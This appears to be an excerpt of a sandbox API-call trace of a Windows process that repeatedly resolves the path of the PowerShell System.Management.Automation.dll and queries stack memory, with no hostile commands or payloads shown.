	[0054.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.835] GetLastError () returned 0x0
	[0054.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.835] GetLastError () returned 0x0
	[0054.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.835] GetLastError () returned 0x0
	[0054.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.836] GetLastError () returned 0x0
	[0054.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.836] GetLastError () returned 0x0
	[0054.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.836] GetLastError () returned 0x0
	[0054.836] VirtualQuery (in: lpAddress=0x22cfa4, lpBuffer=0x22dfa4, dwLength=0x1c | out: lpBuffer=0x22dfa4*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.836] GetLastError () returned 0x0
	[0054.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.836] GetLastError () returned 0x0
	[0054.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.837] GetLastError () returned 0x0
	[0054.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.837] GetLastError () returned 0x0
	[0054.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.837] GetLastError () returned 0x0
	[0054.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.837] GetLastError () returned 0x0
	[0054.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.837] GetLastError () returned 0x0
	[0054.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.837] GetLastError () returned 0x0
	[0054.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.837] GetLastError () returned 0x0
	[0054.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.837] GetLastError () returned 0x0
	[0054.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.837] GetLastError () returned 0x0
	[0054.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.838] GetLastError () returned 0x0
	[0054.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.838] GetLastError () returned 0x0
	[0054.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.838] GetLastError () returned 0x0
	[0054.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.838] GetLastError () returned 0x0
	[0054.838] VirtualQuery (in: lpAddress=0x22cfa4, lpBuffer=0x22dfa4, dwLength=0x1c | out: lpBuffer=0x22dfa4*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.839] GetLastError () returned 0x0
	[0054.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.839] GetLastError () returned 0x0
	[0054.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.839] GetLastError () returned 0x0
	[0054.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.839] GetLastError () returned 0x0
	[0054.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.839] GetLastError () returned 0x0
	[0054.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.839] GetLastError () returned 0x0
	[0054.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.839] GetLastError () returned 0x0
	[0054.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.839] GetLastError () returned 0x0
	[0054.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.840] GetLastError () returned 0x0
	[0054.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.840] GetLastError () returned 0x0
	[0054.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.840] GetLastError () returned 0x0
	[0054.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.840] GetLastError () returned 0x0
	[0054.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.840] GetLastError () returned 0x0
	[0054.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.840] GetLastError () returned 0x0
	[0054.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.840] GetLastError () returned 0x0
	[0054.840] VirtualQuery (in: lpAddress=0x22cfa4, lpBuffer=0x22dfa4, dwLength=0x1c | out: lpBuffer=0x22dfa4*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.841] GetLastError () returned 0x0
	[0054.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.841] GetLastError () returned 0x0
	[0054.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.841] GetLastError () returned 0x0
	[0054.841] VirtualQuery (in: lpAddress=0x22cfa4, lpBuffer=0x22dfa4, dwLength=0x1c | out: lpBuffer=0x22dfa4*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.841] GetLastError () returned 0x0
	[0054.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.841] GetLastError () returned 0x0
	[0054.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.841] GetLastError () returned 0x0
	[0054.842] VirtualQuery (in: lpAddress=0x22cbd4, lpBuffer=0x22dbd4, dwLength=0x1c | out: lpBuffer=0x22dbd4*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.842] VirtualQuery (in: lpAddress=0x22cc10, lpBuffer=0x22dc10, dwLength=0x1c | out: lpBuffer=0x22dc10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.842] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.843] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.843] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.844] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.844] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.844] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.844] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.844] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.845] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.845] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.846] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.846] VirtualQuery (in: lpAddress=0x22cd7c, lpBuffer=0x22dd7c, dwLength=0x1c | out: lpBuffer=0x22dd7c*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.846] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.846] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.847] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.847] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.847] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xe29f542f, Data2=0x2eb8, Data3=0x491a, Data4=([0]=0x9b, [1]=0x37, [2]=0x57, [3]=0xce, [4]=0x3f, [5]=0xf9, [6]=0x8c, [7]=0xac))) returned 0x0
	[0054.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.847] GetLastError () returned 0x0
	[0054.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.848] GetLastError () returned 0x0
	[0054.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.848] GetLastError () returned 0x0
	[0054.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.848] GetLastError () returned 0x0
	[0054.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.848] GetLastError () returned 0x0
